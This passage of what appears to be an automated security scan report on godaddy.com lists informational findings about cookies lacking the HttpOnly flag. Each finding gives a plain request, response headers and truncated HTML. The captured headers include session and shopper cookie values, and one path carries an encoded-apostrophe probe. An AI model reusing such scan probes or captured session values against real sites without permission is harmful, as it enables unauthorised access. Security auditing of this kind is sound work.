Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=gxkfpkufpi23j0awqaogg02h; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=gxkfpkufpi23j0awqaogg02h; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:11 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:11 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:11 GMT; path=/
Set-Cookie: SplitValue1=8; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:40:12 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/search.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=8; domain=godaddy.com; path=/
Set-Cookie: GoogleADServicesgoogleadwordssearch=sdhcigdgxasgtdfitjjgfcdjfjyirgyh; domain=godaddy.com; expires=Sat, 05-Mar-2022 01:40:12 GMT; path=/
Set-Cookie: BlueLithium_domainsearch=sdhcigdgxasgtdfitjjgfcdjfjyirgyh; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:40:11 GMT
Connection: close
Content-Length: 183160


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1">
<
...[SNIP]...

4.51. http://www.godaddy.com/domains/search.aspx/u0027  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /domains/search.aspx/u0027

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /domains/search.aspx/u0027 HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=yg2mogw5b2u0gdpe5pfren4a; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=yg2mogw5b2u0gdpe5pfren4a; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:30 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:30 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:30 GMT; path=/
Set-Cookie: SplitValue1=62; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:40:30 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/search.aspx/u0027&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=62; domain=godaddy.com; path=/
Set-Cookie: GoogleADServicesgoogleadwordssearch=tiijujaegjeeeetbsgeilbxdwjzanffh; domain=godaddy.com; expires=Sat, 05-Mar-2022 01:40:30 GMT; path=/
Set-Cookie: BlueLithium_domainsearch=tiijujaegjeeeetbsgeilbxdwjzanffh; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:40:29 GMT
Connection: close
Content-Length: 183168


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1">
<
...[SNIP]...

4.52. http://www.godaddy.com/domains/searchbulk.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /domains/searchbulk.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /domains/searchbulk.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=wwho5zzrplvm132ghdd13zck; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=wwho5zzrplvm132ghdd13zck; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:21 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:21 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:21 GMT; path=/
Set-Cookie: SplitValue1=67; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:40:21 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/searchbulk.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=67; domain=godaddy.com; path=/
Set-Cookie: GoogleADServicesgoogleadwordssearch=egpigeudqildcasibhngnemaycrcuexa; domain=godaddy.com; expires=Sat, 05-Mar-2022 01:40:21 GMT; path=/
Set-Cookie: BlueLithium_domainsearch=egpigeudqildcasibhngnemaycrcuexa; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:40:20 GMT
Connection: close
Content-Length: 182954


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1">
<
...[SNIP]...

4.53. http://www.godaddy.com/domains/searchidn.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /domains/searchidn.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /domains/searchidn.aspx?ci=53965&domainToCheck= HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=il5zq0qd3haa5mj50zqeou0c; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=il5zq0qd3haa5mj50zqeou0c; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:23 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:23 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:23 GMT; path=/
Set-Cookie: SplitValue1=16; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:40:23 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/searchidn.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=ci=53965&domainToCheck=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=16; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:40:22 GMT
Connection: close
Content-Length: 118674


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

4.54. http://www.godaddy.com/domains/searchresults.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /domains/searchresults.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /domains/searchresults.aspx?ci=44919 HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.godaddy.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ws5jw4vh5tuzq2dphfi4us5a; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; SplitValue1=75; flag1=cflag=us; currencypopin1=cdisplaypopin=false; GoogleADServicesgoogleadwordshome=zbnczeofsfcgdhzeqcxgcadeafyilatc; pathway=221039fb-1ef3-4a9c-9888-ebefb84fcda3; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; HPBackground=Danica2; pagecount=2; actioncount=; app_pathway=; visitor=vid=221039fb-1ef3-4a9c-9888-ebefb84fcda3; traffic=; adc1=US; currency1=potableSourceStr=USD

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:32:08 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/&sitename=www.godaddy.com&page=/domains/searchresults.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=ci=44919%26hpGoogleStatic%3d1&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=221039fb-1ef3-4a9c-9888-ebefb84fcda3&referringdomain=&split=75; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:32:08 GMT
Content-Length: 609450


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1">
<
...[SNIP]...

4.55. http://www.godaddy.com/domains/searchresults.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /domains/searchresults.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /domains/searchresults.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.godaddy.com/domains/search.aspx?ci=53972
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=xggxfvworvbimxmgztq2mtbo; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=xggxfvworvbimxmgztq2mtbo; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:40:46 GMT
Connection: close
Content-Length: 168

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.godaddy.com/domains/search.aspx?ci=53972">here</a>.</h2>
</body></html>

4.56. http://www.godaddy.com/domains/searchreview.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /domains/searchreview.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /domains/searchreview.aspx?pd=yes HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.godaddy.com/hosting/website-builder.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ws5jw4vh5tuzq2dphfi4us5a; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; SplitValue1=75; flag1=cflag=us; currencypopin1=cdisplaypopin=false; GoogleADServicesgoogleadwordshome=zbnczeofsfcgdhzeqcxgcadeafyilatc; pathway=221039fb-1ef3-4a9c-9888-ebefb84fcda3; HPBackground=Danica2; MemPDC1=ljrecdtffbugaahgraqdyjybtizayfne; MemPDCLoc1=net; PCSplitValue1=1; GoogleADServicesgoogleadwordssearch=hbjjxbcaiaffadneicfbdagjqgiiggnd; BlueLithium_domainsearch=keydqgeemhudugljzexamaxfhjofnevf; BlueLithium=ldubxiuhpfmhtbbiyjmelhwaahghdbma; GoogleADServicesgooglessl=zbaitefefbwexbmflgoethnixhqjvich; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=14; actioncount=; app_pathway=; visitor=vid=221039fb-1ef3-4a9c-9888-ebefb84fcda3; BlueLithium_ssl=chsduddeifteyewceiebbfsifczdjdig; traffic=cookies=1&referrer=http://www.godaddy.com/hosting/website-builder.aspx&sitename=www.godaddy.com&page=/hosting/popups/wst-quicktour-widget.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=ci=44038&callback=popUpFill&targetDivId=quickTourDiv&popUpFill=jsonp1330911991097&_=1330912001996%26hpGoogleStatic%3d1&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=221039fb-1ef3-4a9c-9888-ebefb84fcda3&referringdomain=&split=75; adc1=US; currency1=potableSourceStr=USD; ShopperId1=keraxfoewfthxjhclejcpjejtagbwdif

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: preferences1=_sid=gjximhuinjsiadfdihudgbchzbebxbkh&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:55:41 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/hosting/website-builder.aspx&sitename=www.godaddy.com&page=/domains/searchreview.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=pd=yes%26hpGoogleStatic%3d1&shopper=50585199&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=221039fb-1ef3-4a9c-9888-ebefb84fcda3&referringdomain=&split=75; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:55:40 GMT
Content-Length: 93845


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

4.57. http://www.godaddy.com/ecommerce/shopping-cart.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /ecommerce/shopping-cart.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ecommerce/shopping-cart.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=2ybzxzywdjaq1pdh3lrzyntm; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=2ybzxzywdjaq1pdh3lrzyntm; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:20 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:20 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:20 GMT; path=/
Set-Cookie: SplitValue1=93; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:41:20 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/ecommerce/shopping-cart.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=93; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:41:19 GMT
Connection: close
Content-Length: 167563


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><ti
...[SNIP]...

4.58. http://www.godaddy.com/email/email-hosting.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /email/email-hosting.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /email/email-hosting.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=kpe4feamfubaq24rio3hlv2t; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=kpe4feamfubaq24rio3hlv2t; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:13 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:13 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:13 GMT; path=/
Set-Cookie: SplitValue1=33; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:41:13 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/email/email-hosting.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=33; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:41:13 GMT
Connection: close
Content-Length: 140310


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

4.59. http://www.godaddy.com/email/online-storage.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /email/online-storage.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /email/online-storage.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=3cw445ap1nqaqoz0itgtragy; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=3cw445ap1nqaqoz0itgtragy; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:14 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:14 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:14 GMT; path=/
Set-Cookie: SplitValue1=37; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:41:14 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/email/online-storage.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=37; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:41:14 GMT
Connection: close
Content-Length: 127813


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><ti
...[SNIP]...

4.60. http://www.godaddy.com/gear/godaddy-gear.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /gear/godaddy-gear.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gear/godaddy-gear.aspx?ci=46906 HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=y5robm1tq2fdzrco0syk5nb1; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=y5robm1tq2fdzrco0syk5nb1; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:58 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:58 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:58 GMT; path=/
Set-Cookie: SplitValue1=50; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:41:58 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/gear/godaddy-gear.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=ci=46906&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=50; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:41:58 GMT
Connection: close
Content-Length: 149154


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

4.61. http://www.godaddy.com/hosting/content/website_builder_compare_plans.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /hosting/content/website_builder_compare_plans.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hosting/content/website_builder_compare_plans.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=ulpsijty42pjhazfltvo2cy5; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=ulpsijty42pjhazfltvo2cy5; path=/; HttpOnly
Set-Cookie: SplitValue1=29; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:59:02 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/hosting/content/website_builder_compare_plans.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=29; domain=godaddy.com; path=/
Set-Cookie: preferences1=_sid=; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:59:01 GMT
Connection: close
Content-Length: 20961

{"Html":"\r\n\r\n\u003cstyle type=\"text/css\"\u003e\r\n.plan_table {}\r\n.plan_table td {vertical-align: top; border-bottom: solid 1px #b2b2b2;}\r\n\r\n.plan_table td.c1 {border-left: solid 1px #b2b2
...[SNIP]...

4.62. http://www.godaddy.com/hosting/content/website_builder_design_tools.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /hosting/content/website_builder_design_tools.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hosting/content/website_builder_design_tools.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=flscsrfq5l25aactmecbq0wk; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=flscsrfq5l25aactmecbq0wk; path=/; HttpOnly
Set-Cookie: SplitValue1=3; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:59:05 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/hosting/content/website_builder_design_tools.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=3; domain=godaddy.com; path=/
Set-Cookie: preferences1=_sid=; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:59:05 GMT
Connection: close
Content-Length: 13972

{"Html":"\r\n\u003ctable class=\"t12\" width=\"960\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"\u003e\r\n \u003ctr\u003e\r\n \u003ctd width=\"1\" bgcolor=\"#dadada\" class=\"s1 w1\"\u003e&nb
...[SNIP]...

